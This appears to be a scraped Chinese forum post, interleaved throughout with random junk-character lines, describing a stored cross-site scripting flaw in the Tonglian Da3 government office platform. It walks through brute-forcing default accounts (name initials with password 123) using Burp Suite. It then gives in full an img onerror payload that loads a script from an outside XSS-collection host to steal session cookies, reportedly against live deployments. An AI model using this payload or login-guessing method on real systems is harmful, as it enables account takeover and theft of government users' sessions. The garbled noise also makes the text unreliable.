% a2 D8 {4 k3 Y7 t
) B+ L$ V' t8 z
同联Da3协同办公平台后台通用储存型xss漏洞7 F( F, A! C0 P. r9 z
9 R% F2 i# p7 \* h
9 y, m8 S9 i. e) [
平台简介:
8 ]$ b+ E, j) ^5 `$ ~; \
9 Z+ W8 l z& F7 n! W7 H+ L+ W
" G$ c2 \: }2 H4 o2 n* u, ^% x - t; I" p! P# W
& U$ x% P" c% t' Y/ K5 y
?; W1 g/ A2 N9 ^4 m) b: E 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
2 s$ {4 I l4 R( s8 @同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
& {2 B1 e: P, ^1 ?. `+ v9 E" f
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!3 g+ m6 D1 t7 s# I' R' a, P. _
( n+ ] W- O. p v& {2 P Y 9 ?$ I( t! Y x
" d2 R6 z9 G6 L3 }, A' o0 X: I' ^
* w5 ~& v8 b. x1 [, i
5 y. M# @( z* d# A7 K+ K7 t# }- V2 s 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:2 ^2 _6 L. k! M* g4 Y J8 N5 }3 F1 U
s' h8 Y) z5 @* a7 i+ `
/ @/ m( T ~& P0 k5 Q( M. d, r
" F: B" f3 v, h# `3 s; V8 [6 y
( K: {. |6 D# p8 T) x
( I/ i/ l; r+ ~% Q7 H% Y } http://1.1.1.1:7197/cap-aco/#(案例2-)
% X; F8 u8 z3 Z! \( D
/ C, w" s" V& W' l; v( }/ o% n) `
" d! {2 Z. \4 ^" i% m/ F$ d, |
http://www.XXOO.com (案例1-官网网站)
; d. u: h1 t% O Q
5 ?: u B3 [& m- p
& e" S" W$ g9 I( X
漏洞详情:
" `2 E8 o3 p# S- g3 B4 x7 H6 b3 P
. q+ x* J0 H/ a% d) q7 M
, E) x' Y) b- A% `9 S% g3 A 案例一、
+ e4 t# f4 X4 D6 }8 a8 }
5 C0 S$ a2 ^& d# Z: u , X- e" x) q6 {5 ]& S
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
0 W0 _" H O" `. y( W5 D* l4 l T
7 `' G. ~' {2 P$ }
: H& U' @, F d5 ~
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:4 B* f+ r6 g+ V5 m
5 [8 }& H- H% h# ]# L3 ?
4 p% n% T& \" ?
2 K& \, }7 t2 O* u( _
1 N! D6 v) @5 t; f' S
5 `3 u) A/ J6 j- H* Z
) |% d- L% T1 \' D
$ ?# H$ ^# {# g+ Z0 y( l9 _# z8 E
2 Y0 t. E. i: i) P9 C
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ( f% n: i9 v- q+ g
( x4 J8 e* R' r/ T$ @# O# d" w) O
1 C# v; G6 }$ m* k1 | C0 m
- [3 N* U8 o$ t. E" ~! \
- Q9 r7 f$ M: n/ e% o
0 c# ^; y" D4 j4 C0 u7 l# X
% ?; ]7 A3 x; j6 Y& [
, t# s. k: E. T/ ~ & Z0 x# {4 [2 s1 x0 j
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ( j* k( F: ]" @# p1 e
; X0 R8 ^( z' ?' R i& f2 Q( K. h5 u ! Z, j& X O' E" d3 \) h
8 _7 _9 J, r( S5 ]( I
3 s5 T7 i$ ~; ?3 r3 @5 J5 N# A
* @% W1 G0 K+ g2 u7 K; K' i" c
<img src=x
- E# J/ M- `) t! j1 Z2 lonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: . c4 m; G" Q% `6 w1 L
( W, w9 \7 @* w8 O; I/ j% V& h3 x
7 R6 t0 W1 h) T& C1 x' Q% n
- R* D7 M8 ^3 u3 h n3 `) E
3 f- v0 Z8 ^7 @0 S2 F! Z$ ~5 {/ m* E ! h" f/ k E! M8 v
然后发送,接收cookie如图:
. a6 z0 E/ q* m+ }& L( l) `
6 d e' X( d Y# f; B0 t$ s
+ M4 e$ {! ]; J/ v$ s- O 1 n& {$ N3 r8 {% v o6 n
- r$ t4 ]5 c! X; g
2 l( _, H# s1 N( D- m0 ^
% \9 o: g" g; ~
+ j) ]7 Y. ?5 a
2 c$ D' I# F5 q
; g9 [7 N1 f) a" P1 @& u
0 m7 t; S; w5 n0 z6 x( U/ A' O
% E0 c) [9 r! o1 n. Z 5 U2 \. [2 s; r
1 `& l5 F/ z4 \0 [
; f# _& B& q/ ~/ Q' s: R( }
5 I$ g4 U/ V1 t' q% c. O
4 r- f6 Z1 v3 o2 w& U+ f- c3 f, D
% T* U4 _$ S3 j
. q2 M" B3 s: D0 _
; ^ E: X2 l8 E* M( ~
. o, ]" S7 \# m8 n; t$ h
, A) ]' u& c1 ?' U8 N5 t
1 S1 ^% G. p5 _. d1 ~3 q
6 v5 X# L5 O& T4 m 案例2、 : l% g- D- W! r
6 G3 }9 h0 [3 v& F8 R
0 S0 u5 o/ M F% q! F2 X" S% O# O; i$ ^ 前面步骤都一样,下面看效果图: a0 s7 w7 @2 y4 u$ V6 }" ^5 h/ l s
, w7 d2 ]" k3 L6 Z# q Z( Q: ~4 y
9 T. t! J8 n4 S+ H/ C+ v/ U
& ^4 t9 [1 \3 k% h9 }9 X; o
- d! _! R; B* c( C : a+ Z$ C: H% @6 a; ]
8 m5 G$ b% c8 B7 _0 a
9 {) M. ]) @ ^6 U * O) L1 X# i& E# }( a
2 V) n& R* N1 q: f
' f; ]" t$ N: W7 i, L+ t$ I+ n9 \ ( d( a7 T5 Z2 g, Q) _/ E3 o2 U4 S
( {. m; y; ^) ]
* x( ?3 A5 [3 Y3 }: F
- x3 b9 B' u8 ^# _$ w
( w* L9 I$ t) F5 v, N
* _& s" l8 i i" ~) I
% L3 p4 d/ b( j7 w) \8 W2 F $ i5 |5 V. b9 O1 n8 m: ~
# H% p3 c9 S4 U2 b) v 1 S# l- M4 w% C, o2 C/ ]
% A G- v# l; o; ^+ n& l. }9 \7 Q% |" L/ [
7 R/ c+ J3 P& ~; [- H' p' k! H
: o- a1 Z8 d: X+ @' ?
6 G. ~ a: u' ^
+ e9 e, L2 M/ ~5 W
, K/ w" z0 g+ h: G5 K7 `$ h
5 K) Q3 v9 U" W9 y* G
& H: d8 E% m G